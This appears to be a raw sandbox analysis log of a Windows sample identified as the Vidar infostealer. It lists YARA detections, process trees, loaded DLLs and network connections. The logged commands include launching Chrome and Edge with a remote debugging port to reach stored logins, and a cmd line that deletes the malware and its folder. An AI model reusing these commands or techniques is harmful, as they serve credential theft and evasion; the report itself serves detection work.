                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownHTTPS traffic detected: 77.239.117.222:443 -> 192.168.2.8:49713 version: TLS 1.2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_0040EAB5
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,3_2_00405AD3

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa20000.5.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa40000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.a9e0000.3.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa00000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                  Source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00404B3F3_2_00404B3F
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004151473_2_00415147
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00417D563_2_00417D56
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AF7E3_2_0040AF7E
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004171E13_2_004171E1
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004153AF3_2_004153AF
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040D84A appears 136 times
                  Source: N11R7lRasm.exeStatic PE information: invalid certificate
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs N11R7lRasm.exe
                  Source: N11R7lRasm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa20000.5.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa40000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.a9e0000.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa00000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                  Source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: f379r9.3.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@70/285@26/20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,3_2_0040F029
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3I2CGZB2.htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\60955aac-6838-446c-a1a5-1b3b2b60e26f.tmpJump to behavior
                  Source: N11R7lRasm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: rimglf379.3.dr, mohl68yct.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: N11R7lRasm.exeReversingLabs: Detection: 29%
                  Source: N11R7lRasm.exeVirustotal: Detection: 25%
                  Source: N11R7lRasm.exeString found in binary or memory: net/addrselect.go
                  Source: N11R7lRasm.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
                  Source: unknownProcess created: C:\Users\user\Desktop\N11R7lRasm.exe "C:\Users\user\Desktop\N11R7lRasm.exe"
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2372,i,16807786506752163932,14709765720490292279,262144 /prefetch:8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2468,i,12661693246344684828,3544474529301919065,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6648 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5344 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exitJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2372,i,16807786506752163932,14709765720490292279,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2468,i,12661693246344684828,3544474529301919065,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6648 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5344 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
